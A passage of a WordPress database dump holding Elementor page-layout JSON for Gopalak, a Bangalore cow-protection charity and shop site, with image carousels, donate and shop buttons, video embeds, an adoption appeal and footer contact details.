":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11827,1962,'_elementor_page_assets','a:0:{}'),(11830,1963,'_elementor_edit_mode','builder'),(11831,1963,'_elementor_template_type','wp-page'),(11832,1963,'_elementor_version','3.7.8'),(11833,1963,'_wp_page_template','elementor_canvas'),(11834,1963,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"72051db\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26e5a5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"c20d2f2\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"9230eae\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"f509e14\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f468db2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"2250764\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87f91ce\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"9860375\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c30f35b\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab 